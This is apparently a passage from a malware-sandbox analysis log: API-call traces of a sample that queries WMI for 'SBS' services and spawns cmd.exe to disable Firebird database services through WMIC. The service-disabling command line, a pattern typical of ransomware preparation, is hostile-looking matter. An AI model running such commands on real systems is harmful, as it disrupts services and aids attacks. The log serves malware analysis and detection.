[0112.728] lstrlenW (lpString="from") returned 4 [0112.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0112.728] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab880677 | out: _String=0x0, _Context=0xab880677) returned="Win32_Service" [0112.728] IWbemServices:GetObject (in: This=0x5c05f8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x36f70c*=0x0, ppCallResult=0x0 | out: ppObject=0x36f70c*=0x5e5928, ppCallResult=0x0) returned 0x0 [0112.767] IWbemClassObject:GetMethod (in: This=0x5e5928, wszName="STOPSERVICE", lFlags=0, ppInSignature=0x36f718, ppOutSignature=0x36f704 | out: ppInSignature=0x36f718*=0x0, ppOutSignature=0x36f704*=0x5e5ca8) returned 0x0 [0112.767] IUnknown:Release (This=0x5e5ca8) returned 0x0 [0112.767] IUnknown:Release (This=0x5e5928) returned 0x0 [0112.767] ??0CHString@@QAE@XZ () returned 0x36f5e4 [0112.767] GetCurrentThreadId () returned 0xe8c [0112.768] lstrlenA (lpString="") returned 0 [0112.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x7c8b20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.768] lstrlenA (lpString="") returned 0 [0112.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x7c8b20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.768] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.768] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0112.768] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xab8805ff | out: _String="Select", _Context=0xab8805ff) returned="Select" [0112.768] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab8805ff | out: _String=0x0, _Context=0xab8805ff) returned="*" [0112.768] lstrlenW (lpString="FROM") returned 4 [0112.768] lstrlenW (lpString="*") returned 1 [0112.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0112.768] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab8805ff | out: _String=0x0, _Context=0xab8805ff) returned="from" [0112.768] lstrlenW (lpString="FROM") returned 4 [0112.768] lstrlenW (lpString="from") returned 4 [0112.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0112.768] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xab8805ff | out: _String=0x0, _Context=0xab8805ff) returned="Win32_Service" [0112.768] lstrlenA (lpString="SELECT * FROM ") returned 14 [0112.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x7c8fe8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0112.768] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0112.768] SysStringLen (param_1="Win32_Service") returned 0xd [0112.769] lstrlenA (lpString=" WHERE ") returned 7 [0112.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x7c8e88, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0112.769] SysStringLen (param_1=" WHERE ") returned 0x7 [0112.769] SysStringLen (param_1="caption LIKE '%SBS%'") returned 0x14 [0112.769] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0112.769] SysStringLen (param_1=" WHERE caption LIKE '%SBS%'") returned 0x1b [0112.769] IWbemServices:ExecQuery (in: This=0x5c05f8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SBS%'", lFlags=48, pCtx=0x0, ppEnum=0x36f5ec | out: ppEnum=0x36f5ec*=0x5e5cd0) returned 0x0 [0112.777] CoSetProxyBlanket (pProxy=0x5e5cd0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0112.779] IEnumWbemClassObject:Next (in: This=0x5e5cd0, lTimeout=-1, uCount=0x1, apObjects=0x36f5f0, puReturned=0x36f5dc | out: apObjects=0x36f5f0*=0x0, puReturned=0x36f5dc*=0x0) returned 0x1 [0113.278] IUnknown:Release (This=0x5e5cd0) returned 0x0 [0113.280] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.280] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.280] GetCurrentThreadId () returned 0xe8c [0113.280] ??0CHString@@QAE@PBG@Z () returned 0x36f7a8 [0113.280] ??YCHString@@QAEABV0@PBG@Z () returned 0x36f7a8 [0113.281] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x7c9040, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0113.281] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0113.281] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x7c8a80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0113.281] __iob_func () returned 0x77ac1208 [0113.281] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0113.289] __iob_func () returned 0x77ac1208 [0113.289] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0113.289] ??1CHString@@QAE@XZ () returned 0x1 [0113.289] IUnknown:Release (This=0x5c05f8) returned 0x0 [0113.297] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0113.298] _kbhit () returned 0x0 [0113.312] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0113.312] WbemLocator:IUnknown:Release (This=0x598048) returned 0x2 [0113.312] IUnknown:Release (This=0x5c0648) returned 0x0 [0113.313] IUnknown:Release (This=0x5c0828) returned 0x0 [0113.313] WbemLocator:IUnknown:Release (This=0x598048) returned 0x1 [0113.313] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0113.313] WbemLocator:IUnknown:Release (This=0x598048) returned 0x0 [0113.315] CoUninitialize () [0113.329] exit (_Code=0) [0113.329] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.329] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 231 os_tid = 0xe90 Thread: id = 232 os_tid = 0xe94 Thread: id = 233 os_tid = 0xe98 Thread: id = 234 os_tid = 0xe9c Process: id = "49" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1d24a000" os_pid = "0xeb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3234 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3235 start_va = 0x940000 end_va = 0x493ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 3236 start_va = 0x4940000 end_va = 0x495ffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 3237 start_va = 0x4960000 end_va = 0x4961fff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 3238 start_va = 0x4970000 end_va = 0x4983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 3239 start_va = 0x4990000 end_va = 0x49cffff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 3240 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 3241 start_va = 0x4ad0000 end_va = 0x4ad3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 3242 start_va = 0x4ae0000 end_va = 0x4ae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ae0000" filename = "" Region: id = 3243 start_va = 0x4af0000 end_va = 0x4af1fff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 3244 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3245 start_va = 0x7e930000 end_va = 0x7e952fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e930000" filename = "" Region: id = 3246 start_va = 0x7e954000 end_va = 0x7e954fff entry_point = 0x0 region_type = private name = "private_0x000000007e954000" filename = "" Region: id = 3247 start_va = 0x7e95c000 end_va = 0x7e95efff entry_point = 0x0 region_type = private name = "private_0x000000007e95c000" filename = "" Region: id = 3248 start_va = 0x7e95f000 end_va = 0x7e95ffff entry_point = 0x0 region_type = private name = "private_0x000000007e95f000" filename = "" Region: id = 3249 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3250 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3251 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3252 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3253 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3254 start_va = 0x4bb0000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 3255 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3256 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3257 start_va = 0x4c50000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 3258 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3299 start_va = 0x4940000 end_va = 0x494ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 3300 start_va = 0x4b00000 end_va = 0x4b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 3301 start_va = 0x4d50000 end_va = 0x4e0dfff entry_point = 0x4d50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3302 start_va = 0x4e10000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 3303 start_va = 0x5030000 end_va = 0x503ffff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 3304 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3305 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3306 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3307 start_va = 0x7e830000 end_va = 0x7e92ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e830000" filename = "" Region: id = 3308 start_va = 0x7e959000 end_va = 0x7e95bfff entry_point = 0x0 region_type = private name = "private_0x000000007e959000" filename = "" Region: id = 3309 start_va = 0x4950000 end_va = 0x4953fff entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 3310 start_va = 0x4960000 end_va = 0x4963fff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 3311 start_va = 0x5040000 end_va = 0x5376fff entry_point = 0x5040000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 235 os_tid = 0xeb4 [0113.513] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0113.513] __set_app_type (_Type=0x1) [0113.513] __p__fmode () returned 0x77ac4d6c [0113.513] __p__commode () returned 0x77ac5b1c [0113.513] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0113.514] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0113.514] GetCurrentThreadId () returned 0xeb4 [0113.514] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb4) returned 0x84 [0113.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0113.514] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0113.514] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.516] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.516] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4acfa40 | out: phkResult=0x4acfa40*=0x0) returned 0x2 [0113.516] VirtualQuery (in: lpAddress=0x4acfa47, lpBuffer=0x4acf9f8, dwLength=0x1c | out: lpBuffer=0x4acf9f8*(BaseAddress=0x4acf000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0113.516] VirtualQuery (in: lpAddress=0x49d0000, lpBuffer=0x4acf9f8, dwLength=0x1c | out: lpBuffer=0x4acf9f8*(BaseAddress=0x49d0000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0113.516] VirtualQuery (in: lpAddress=0x49d1000, lpBuffer=0x4acf9f8, dwLength=0x1c | out: lpBuffer=0x4acf9f8*(BaseAddress=0x49d1000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0113.516] VirtualQuery (in: lpAddress=0x49d3000, lpBuffer=0x4acf9f8, dwLength=0x1c | out: lpBuffer=0x4acf9f8*(BaseAddress=0x49d3000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0113.516] VirtualQuery (in: lpAddress=0x4ad0000, lpBuffer=0x4acf9f8, dwLength=0x1c | out: lpBuffer=0x4acf9f8*(BaseAddress=0x4ad0000, AllocationBase=0x4ad0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0113.517] GetConsoleOutputCP () returned 0x1b5 [0113.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0113.517] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0113.517] _get_osfhandle (_FileHandle=1) returned 0x3c [0113.517] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0113.517] _get_osfhandle (_FileHandle=1) returned 0x3c [0113.517] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0113.517] _get_osfhandle (_FileHandle=1) returned 0x3c [0113.517] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0113.518] _get_osfhandle (_FileHandle=0) returned 0x38 [0113.518] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0113.518] _get_osfhandle (_FileHandle=0) returned 0x38 [0113.518] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0113.518] GetEnvironmentStringsW () returned 0x4c57e10* [0113.518] FreeEnvironmentStringsA (penv="A") returned 1 [0113.518] GetEnvironmentStringsW () returned 0x4c57e10* [0113.518] FreeEnvironmentStringsA (penv="A") returned 1 [0113.518] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4ace9a4 | out: phkResult=0x4ace9a4*=0x94) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x0, lpData=0x4ace9b0*=0x60, lpcbData=0x4ace9ac*=0x1000) returned 0x2 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x1, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x0, lpData=0x4ace9b0*=0x1, lpcbData=0x4ace9ac*=0x1000) returned 0x2 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x0, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x40, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x40, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x0, lpData=0x4ace9b0*=0x40, lpcbData=0x4ace9ac*=0x1000) returned 0x2 [0113.519] RegCloseKey (hKey=0x94) returned 0x0 [0113.519] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4ace9a4 | out: phkResult=0x4ace9a4*=0x94) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x0, lpData=0x4ace9b0*=0x40, lpcbData=0x4ace9ac*=0x1000) returned 0x2 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x1, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x0, lpData=0x4ace9b0*=0x1, lpcbData=0x4ace9ac*=0x1000) returned 0x2 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x0, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x9, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x4, lpData=0x4ace9b0*=0x9, lpcbData=0x4ace9ac*=0x4) returned 0x0 [0113.519] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ace9a8, lpData=0x4ace9b0, lpcbData=0x4ace9ac*=0x1000 | out: lpType=0x4ace9a8*=0x0, lpData=0x4ace9b0*=0x9, lpcbData=0x4ace9ac*=0x1000) returned 0x2 [0113.519] RegCloseKey (hKey=0x94) returned 0x0 [0113.519] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29822 [0113.519] srand (_Seed=0x5ad29822) [0113.519] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'" [0113.519] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'" [0113.519] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0113.519] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c59d68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0113.519] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0113.519] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.520] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.520] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0113.520] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0113.520] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0113.520] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0113.520] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0113.520] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0113.520] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0113.520] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0113.520] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0113.520] GetEnvironmentStringsW () returned 0x4c57e10* [0113.520] FreeEnvironmentStringsA (penv="A") returned 1 [0113.520] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.520] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.520] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0113.520] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0113.520] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0113.520] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0113.520] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0113.520] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0113.520] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0113.520] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0113.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acf77c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0113.520] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4acf77c, lpFilePart=0x4acf774 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4acf774*="Desktop") returned 0x1d [0113.521] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0113.521] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4acf4f8 | out: lpFindFileData=0x4acf4f8) returned 0x4c505c8 [0113.521] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0113.521] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4acf4f8 | out: lpFindFileData=0x4acf4f8) returned 0x4c505c8 [0113.521] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0113.521] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0113.521] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4acf4f8 | out: lpFindFileData=0x4acf4f8) returned 0x4c505c8 [0113.521] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0113.521] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0113.521] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0113.521] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0113.521] GetEnvironmentStringsW () returned 0x4c57e10* [0113.521] FreeEnvironmentStringsA (penv="=") returned 1 [0113.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: 